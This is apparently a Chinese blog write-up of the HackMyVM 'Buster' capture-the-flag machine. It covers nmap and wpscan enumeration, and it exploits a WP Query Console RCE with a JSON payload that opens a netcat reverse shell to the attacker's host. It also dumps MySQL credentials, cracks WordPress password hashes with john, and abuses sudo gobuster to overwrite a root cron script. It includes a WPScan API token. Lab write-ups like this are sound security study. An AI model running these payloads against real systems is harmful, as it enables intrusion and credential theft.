Lookthrough for HackMyVM_Buster

HackMyVM_Buster

这台机子的网卡又有问题
配好后,nmap扫一下

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/usr/share/wordlists/metasploit]
└─# nmap 192.168.64.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-18 01:44 EST
Nmap scan report for 192.168.64.6
Host is up (0.00068s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: CE:5E:DA:EA:E4:33 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 13.27 seconds

上80看了下 是wordpress
wpscan扫一下 这里学到了 用免费的wpscan官网的api-token可以扫一下数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
┌──(root㉿kali)-[/usr/share/wordlists/metasploit]
└─# wpscan --url http://192.168.64.6/ -e vp,u --api-token wfO2qNYqlam4QGql4RFJXIXG0oohePz5k7kSpRbXxfI
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.64.6/ [192.168.64.6]
[+] Started: Tue Feb 18 01:44:10 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.64.6/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.64.6/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.64.6/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.64.6/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Outdated, released on 2024-11-21).
 | Found By: Meta Generator (Passive Detection)
 |  - http://192.168.64.6/, Match: 'WordPress 6.7.1'
 | Confirmed By: Rss Generator (Aggressive Detection)
 |  - http://192.168.64.6/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://192.168.64.6/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.64.6/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 1
 | Requests Remaining: 24

[+] Finished: Tue Feb 18 01:44:13 2025
[+] Requests Done: 17
[+] Cached Requests: 42
[+] Data Sent: 4.404 KB
[+] Data Received: 56.764 KB
[+] Memory used: 216.934 MB
[+] Elapsed time: 00:00:03

有用户凭据ta0和welcome 但是爆破好像都不太行
又学到了 wpscan扫插件得更细一点
wpscan --url http://192.168.64.6/ -e ap --plugins-detection --api-token wfO2qNYqlam4QGql4RFJXIXG0oohePz5k7kSpRbXxfI
扫的疑似有点慢了 下次真得把kali内存和处理器数调上去了

1
2
3
4
5
6
7
8
[!] 1 vulnerability identified:
 |
 | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
 |     References:
 |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
 |

结果是有wp query的洞
见这里利用(github)

可以执行任意php命令 就是ban了一些系统函数 但是没完全ban
{"queryArgs":"shell_exec('nc -e /bin/bash 192.168.64.2 1234');","queryType":"post"}
直接把shell弹回来 顺便升级一下shell

读wp-config.php 拿到mysql凭据ll104567:thehandsomeguy
mysql -u ll104567 -p登上去

1
2
3
use wordpress;
show tables;
select * from wp_users;

拿到ta0和welcome的密码hash 用john跑rockyou
ta0:$P$BDDc71nM67DbOVN/U50WFGII6EF6.r.
welcome:$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
104567           (?)
1g 0:00:00:36 DONE (2025-02-18 02:21) 0.02724g/s 20200p/s 20200c/s 20200C/s 112233669..085356
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

跑出welcome的密码是104567 ta0的跑不出来
ssh登上welcome就能拿到user flag

1
2
3
4
5
6
7
welcome@listen:~$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster

sudo -l发现可以运行gobuster
这里又学到了(
先拉个pspy64下来看看定时任务
2025/02/18 02:50:01 CMD: UID=0 PID=1304 | /bin/sh -c /bin/bash /opt/.test.sh
有一个/opt/.test.sh 联想到gobuster -o可以写入文件 所以把这个.test.sh覆写了就行

覆写流程
首先攻击机必须得有对应的路径 比如我在~下启动python服务器 那么想要有输出(比如说/tmp/b)写入/opt/.test.sh 则必须mkdir tmp;cd /tmp;touch b 即有这个路径能给gobuster访问 同时echo 'tmp/b' > a.txt这是宿主机的操作 因为gobuster会在最前面补上一个/
sudo gobuster -w a.txt -u http://192.168.64.2:8000/ -n -q -o /opt/.test.sh
ls看到/opt/.test.sh的大小确实发生了变化

但是不知道什么情况 覆写了之后shell就是弹不回来???

#Penetration #lookthrough
Lookthrough for HackMyVM_Buster
http://example.com/2025/02/18/HackMyVM_Buster/
作者
Jednersaous
发布于
2025年2月18日
许可协议